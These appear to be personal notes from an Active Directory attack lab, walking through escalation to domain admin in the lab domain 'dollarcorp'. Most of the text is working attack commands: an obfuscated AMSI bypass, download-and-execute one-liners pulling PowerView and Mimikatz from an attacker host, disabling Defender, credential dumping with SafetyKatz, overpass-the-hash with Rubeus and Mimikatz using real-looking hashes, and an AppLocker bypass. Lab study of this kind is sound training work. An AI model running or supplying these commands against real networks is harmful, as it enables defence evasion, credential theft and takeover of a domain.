🔴Domain admin Enum/Access

User Hunting

Now we can start Domain user-hunting , in order to be a domain admin we need to find a MACHINE whose user is a DOMAIN ADMIN and we as a local user have the ACCESS / SESSION After finding that machine we try to gain access or EXECUTE WINDOW COMMAND and aftern that we need to extract the HASH of the user

invoke-userhunter -checkaccess

find-domainuserlocation

dcorp\ciadmin ==> svcadmin => dcorp-dc

we (dcorp\student171) got reverse shell as ciadmin (dcorp\ciadmin) now we need to enumerate Domain Admin user but before that we need to do 3 things

Bypass and script loading

1. Do sbloginbypass in reverse shell , but first host the file on HFS

iex (iwr http://172.16.100.171/sbloggingbypass.txt -UseBasicParsing)

1. bypass AMSI in reverse shell

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

1. load powerview in reverse shell

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.171/PowerView.ps1'))

User Hunting

invoke-userhunter -checkaccess

find-domainuserlocation

we got the user svcadmin on whose machine (dcorp-mgmt) we have access, now we can abuse the machine using

• winrs

• PowerShell Remoting

Abusing

Abusing using winrs

1. check if we can execute command on that machine

winrs -r:dcorp-mgmt hostname;whoami

1. Now try to extract hash of svc admin using SafetyKatz.exe

Load safetykatz in remote machine (dcorp-mgmt)

iwr http://172.16.100.171/Loader.exe -OutFile C:\Users\Public\Loader.exe

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

turn on port forwarding

$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.171”

Execte the script , check the result & look for domain admin (svc-admin) hash

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

or

$null | winrs -r:dcorp-mgmt "C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit"

Abusing using Powershell remoting

1. check if we can execute commands on remote machine

invoke-command -scriptblock{whoami;hostname} -computername dcorp-mgmt.dollarcorp.moneycorp.local

1. Load mimikatz on our revershell machine (jenkins server - dcorp-ci)

iex (iwr http://172.16.100.171/Invoke-MimiKatz.ps1 -UseBasicParsing)

1. set session in variable

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

1. Bypass firewall on remote machine (dcorp-mgmt)

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

1. Run any script (mimi , mimikatz , safetykatz ,rubeus) on remote machine

Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

Over Pass the hash

we can use the hash of svc-admin to execute commands on domain controller (dcorp-dc) For this we can use any script we want - i will use these 2

• Rubeus

• Mimikatz

Rubeus

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:svc-admin-aes256-hash /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

this will open cmd , and if we run any whoami ; hostnameit shows our user (dcorp\student171 ; dcorp-std171) To check it correctly :-

winrs -r:dcorp-dc whoami

winrs -r:dcorp-dc hostname

Mimikatz

invoke-mimikatz -command '"sekurlsa::pth /user:svcadmin /domain::dollarcorp.moneycorp.local /ntlm::b38ff50264b74508085d82c69794a4d8 /run::powershell.exe"'

this will open powershell , and if we run any whoami ; hostnameit shows our user (dcorp\student171 ; dcorp-std171) To check it correctly :-

invoke-command scriptblock{whoami} -computername dcorp-dc.dollarcorp.moneycorp.local

invoke-command scriptblock{hostname} -computername dcorp-dc.dollarcorp.moneycorp.local

dcorp\student171 => srvadmin => svcadmin => dcorp-dc

Derivative Local Admin

1. find out the machines on which we have local admin privileges

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

1. gaining access or exeuting command directly

winrs -r:dcorp-adminsrv cmd

enter-pssession -computername dcorp-adminsrv.dollarcorp.moneycorp.local

When executing mimikatz or safetykatz remote machine blocking us

Let's check if Applocker is configured on dcorp-adminsrv

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2

yes it is configured lets go through the policies of applocker

reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d

we can also check this by doing

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Default rule is enabled the result we got = All scripts located in the Program Files folder" Description="Allows members of the Everyone group to run scripts that are located in the Program Files folder.

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

over pass the hash

 C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

The new process (cmd or powershell) that starts has srvadmin privileges. Check if srvadmin has admin privileges on any other machine

now we are srvadmin , and after checking our access on machines we found that dcorp-mgmt (svcadmin)

After that whole process is same